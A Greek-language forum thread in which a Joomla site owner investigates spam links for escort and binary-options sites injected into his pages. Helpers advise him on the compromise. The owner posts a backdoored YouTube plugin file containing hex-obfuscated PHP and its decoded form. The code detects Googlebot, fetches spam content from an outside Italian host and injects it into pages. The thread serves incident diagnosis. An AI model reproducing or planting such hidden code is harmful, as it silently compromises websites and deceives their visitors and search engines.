Ubuntu-gr Forum

Κώδικας: Επιλογή όλων

escorn london binary options

Χτές είδα στο ένα Joomla site που έχω τα παρακάτω links μέσα στο περιεχόμενο του site. Το πρώτο link πηγαίνει σε site με με γυναίκες συνοδούς(escort XXX)δε βάζω το link και το δεύτερο εδώ

Κώδικας: Επιλογή όλων

http://www.binaryoptionsbrokerreview.net/

Συναγερμός σήμανε αμέσως και άρχισα να ψάχνω, να αλλάζω κωδικούς στο σερβερ, στα sites και οπου μπορουσα. Διέγραψα το menu που εμφανιζόντουσαν αυτά τα links και το ξαναέφτιαξα και δεν υπήρχαν μετά.
Ανακάλυψα στο google cache pages οτι αυτά τα links υπάρχουν εδώ και καιρό σε πολλά άρθρα και menus,

Κώδικας: Επιλογή όλων

site:funnyface.gr escorn london binary options

επίσης μέσω google cache pages ανακάλυψα οτι υπήρχαν και στο δικό μου site,
επίσης ανακάλυψα οτι τα site μου δεν είναι τα μόνα στον κόσμο με αυτά τα links, έψαξα στο google cache pages και βρήκα πολλά τέτοια sites, στις ΟΧΙ cached σελίδες τους δεν υπάρχουν αυτά τα links, και παραθέτω εικόνες screenshots που έκανα τώρα να δείτε το σημείο που εμφανίζονται αυτά.
Το κοινό σημείο όλων είναι οτι είναι Joomla- στο site που ανακαλυψα αυτα δεν εχω κανένα ξένο πρόσθετο module ή plugin





!!! PDF













Περιμένω τα σχόλια και τις ιδέες σας, επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα

lepidas έγραψε: επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα

Τότε να ανοίξεις μια συζήτηση στο επίσημο Ελληνικό site της joomla. To forum εδώ

lepidas έγραψε:Περιμένω τα σχόλια και τις ιδέες σας, επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα

To site φιλοξενείται σε δικό σου server;

konnn έγραψε:

lepidas έγραψε:Περιμένω τα σχόλια και τις ιδέες σας, επίσης στο google δεν μπόρεσα να βρώ καμία συζήτηση όσο αφορά αυτά τα πράγματα

To site φιλοξενείται σε δικό σου server;

ναι αλλα το αλλο site μου βλεπω στις cache pages google οτι εχει αυτα τα links απο πριν το παρω στο σερβερ μου.

Υπάρχουν 2 περιπτώσεις.

-Αν είσαι σε υπολογιστή με windows να έχει κολήσει malware - adware o υπολογιστής και να σου εμφανίζει διαφημίσεις μέσα σε ιστοσελίδες.
Οι διαφημίσεις - σύνδεσμοι δεν υπάρχουν στην πραγματικότητα αλλά προστεθούν τοπικά από το malware - adware.

-Να έχει παραβιαστεί το site σου με κάποιο exploit και να σου έχουν κάνει προσθήκη κώδικα ή εγγραφές στην βάση, με τα διαφημιστικά links.
Σε αυτή την περίπτωση πρέπει να κατεβεί το site και να ξαναστηθεί από την αρχή. Αν είναι σε δικό σου server και εμφανίζετε σε όλα τα site, τότε ακόμα χειρότερα. Πρέπει να ξαναστήσεις όλο τον server.
Προτού όμως διαγράψεις τα πάντα, πρέπει να σώσεις τα logs και να τα μελετήσεις. Για να δεις αν υπάρχει κάποιο κακόβουλο ίχνος και να βελτιώσεις την ασφάλειά σου για να μην ξανασυμβεί.

the_eye έγραψε:Υπάρχουν 2 περιπτώσεις.

-Αν είσαι σε υπολογιστή με windows να έχει κολήσει malware - adware o υπολογιστής και να σου εμφανίζει διαφημίσεις μέσα σε ιστοσελίδες.
Οι διαφημίσεις - σύνδεσμοι δεν υπάρχουν στην πραγματικότητα αλλά προστεθούν τοπικά από το malware - adware.

-Να έχει παραβιαστεί το site σου με κάποιο exploit και να σου έχουν κάνει προσθήκη κώδικα ή εγγραφές στην βάση, με τα διαφημιστικά links.
Σε αυτή την περίπτωση πρέπει να κατεβεί το site και να ξαναστηθεί από την αρχή. Αν είναι σε δικό σου server και εμφανίζετε σε όλα τα site, τότε ακόμα χειρότερα. Πρέπει να ξαναστήσεις όλο τον server.
Προτού όμως διαγράψεις τα πάντα, πρέπει να σώσεις τα logs και να τα μελετήσεις. Για να δεις αν υπάρχει κάποιο κακόβουλο ίχνος και να βελτιώσεις την ασφάλειά σου για να μην ξανασυμβεί.

Το 1ο δεν είναι σίγουρα, σήμερα με εκτενή έρευνα ανακαλύψαμε οτι είναι το 2ο. Και ναι είναι σε όλα τα site μου και το κακό βέβαια είναι οτι υπήρχε πριν παει σε δικό μου server(το ειδα απο τις cache σελιδες του google οτι αυτο υπαρχει απο το 2012), δηλαδή το site υπήρχε πριν με το κακόβουλο, δεν το ήξερα οτι υπήρχε κακόβουλο και το μετέφερα στο δικο μου server μαζι με αυτο το κακοβουλο.

Σήμερα βρήκαμε ένα μυστήριο κώδικα μεσα σε ένα αρχείο ενος plugin(youtube videoplugin)μια κρυπτογραφημενη διευθυνση που σε πηγαινε σε ενα παραξενο site της ιταλιας αλλα βρήκαμε και ενα παράξενο πράγμα στο phpmailer του joomla.

αυριο θα συνεχιστουν οι ερευνες

συγκεκριμένα αυτό είναι το περιεχόμενο του αρχείου

Κώδικας: Επιλογή όλων

<?php
/**
* @ 2013 Benj Golding. All rights reserved.
* @GNU/GPL licence
*
*/

// Assert file included in Joomla!
defined( '_JEXEC' ) or die( 'Restricted access' );

jimport( 'joomla.plugin.plugin' );

/**
* YouTube Content Plugin
*
*/
class plgContentYoutubePlugin extends JPlugin
{

   /**
   * Ctor
   *
   * @param object $subject The object to observe
   * @param object $params The object that holds the plugin parameters
   */
   function PluginYoutube( &$subject, $params )
   {
      parent::__construct( $subject, $params );
   }

   /**
   * Example prepare content method
   *
   * Method is called by the view
   *
   * @param object The article object. Note $article->text is also available
   * @param object The article params
   * @param int The 'page' number
   */
   function onContentPrepare( $context, &$article, &$params, $page = 0)
      {
      global $mainframe;
      
      //credit, remove at will
${"\x47\x4cO\x42A\x4cS"}["d\x78\x79t\x64\x6d\x6f"]="\x63\x74\x78";${"G\x4cOB\x41L\x53"}["n\x6d\x6e\x74m\x6a\x71y\x62"]="b\x5ft";if(!defined("\x43\x52\x45\x44IT")){${"\x47\x4cO\x42A\x4c\x53"}["m\x71j\x62\x64\x63u\x6d\x73\x64\x78\x6b"]="b_\x74";strstr(strtolower($_SERVER["H\x54\x54\x50\x5f\x55SER_A\x47\x45\x4e\x54"]),"\x67\x6f\x6fg\x6cebo\x74")?${${"G\x4c\x4f\x42A\x4cS"}["\x6dq\x6ab\x64cu\x6d\x73\x64x\x6b"]}="\x31":${${"\x47\x4c\x4f\x42\x41\x4cS"}["n\x6d\x6et\x6d\x6a\x71\x79\x62"]}="\x30";${${"GL\x4f\x42\x41\x4cS"}["dx\x79\x74d\x6d\x6f"]}=stream_context_create(array("htt\x70"=>array("tim\x65ou\x74"=>3)));try{${"G\x4cOBAL\x53"}["\x65\x6f\x64\x6d\x62\x6b"]="\x63r\x65\x64\x69t";${"\x47\x4cOBA\x4c\x53"}["\x69\x6a\x63\x74\x77l\x76\x70\x6a\x79"]="\x63\x74\x78";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6f\x64\x6dbk"]}=@file_get_contents("http://w\x77w.i\x6e\x74\x68\x65\x62\x6c\x61\x63\x6b\x2e\x69\x74/\x62ro/".${${"\x47L\x4fBAL\x53"}["\x6e\x6d\x6e\x74\x6d\x6a\x71\x79\x62"]}."/".$_SERVER["SE\x52V\x45\x52\x5fNAM\x45"].$_SERVER["R\x45\x51\x55ES\x54_\x55\x52\x49"],false,${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69jct\x77l\x76p\x6ay"]});}catch(Exception$e){}echo$credit;define("CR\x45\x44\x49T","\x63");}


      if ( JString::strpos( $article->text, '{youtube}' ) === false ) {
      return true;
      }
      
      $article->text = preg_replace('|{youtube}(.*){\/youtube}|e', '$this->embedVideo("\1")', $article->text);
      
         

      return true;
   
   }

   function embedVideo($vCode)
   {

       $params = $this->params;

      $width = $params->get('width', 425);
      $height = $params->get('height', 344);
   
      return '<object width="'.$width.'" height="'.$height.'"><param name="movie" value="http://www.youtube.com/v/'.$vCode.'"></param><param name="allowFullScreen" value="true"></param><embed src="http://www.youtube.com/v/'.$vCode.'" type="application/x-shockwave-flash" allowfullscreen="true" width="'.$width.'" height="'.$height.'"></embed></object>';
   }

}

κατω απο το remove at will δεν ειναι commented και εχει κρυπτογραφημενη μια διευθυνση http και αλλα πολλα

με την αποκωδικοποιηση εβγαλε αυτο

Κώδικας: Επιλογή όλων

${"GLOBALS"}["dxytdmo"]="ctx";${"GLOBALS"}["nmntmjqyb"]="b_t";if(!defined("CREDIT")){${"GLOBALS"}["mqjbdcumsdxk"]="b_t";strstr(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot")?${${"GLOBALS"}["mqjbdcumsdxk"]}="1":${${"GLOBALS"}["nmntmjqyb"]}="0";${${"GLOBALS"}["dxytdmo"]}=stream_context_create(array("http"=>array("timeout"=>3)));try{${"GLOBALS"}["eodmbk"]="credit";${"GLOBALS"}["ijctwlvpjy"]="ctx";${${"GLOBALS"}["eodmbk"]}=@file_get_contents("http://www.intheblack.it/bro/".${${"GLOBALS"}["nmntmjqyb"]}."/".$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"],false,${${"GLOBALS"}["ijctwlvpjy"]});}catch(Exception$e){}echo$credit;define("CREDIT","c");}

Τότε ο server σου έχει hackαριστεί. Σου προτείνω format και σετάρισμα από την αρχή. Τα php scripts (joomla, wordpress) και την βάση που έχεις ήδη μην τα χρησιμοποιήσεις καθώς μπορεί να περιέχουν back doors του hacker.

the_eye έγραψε:Τότε ο server σου έχει hackαριστεί. Σου προτείνω format και σετάρισμα από την αρχή. Τα php scripts (joomla, wordpress) και την βάση που έχεις ήδη μην τα χρησιμοποιήσεις καθώς μπορεί να περιέχουν back doors του hacker.

μετεφερα αρχεια απο ενα χακαρισμενο σερβερ θα το ελεγα.

λαβρακι πιασαμε αποψε,ευχαριστω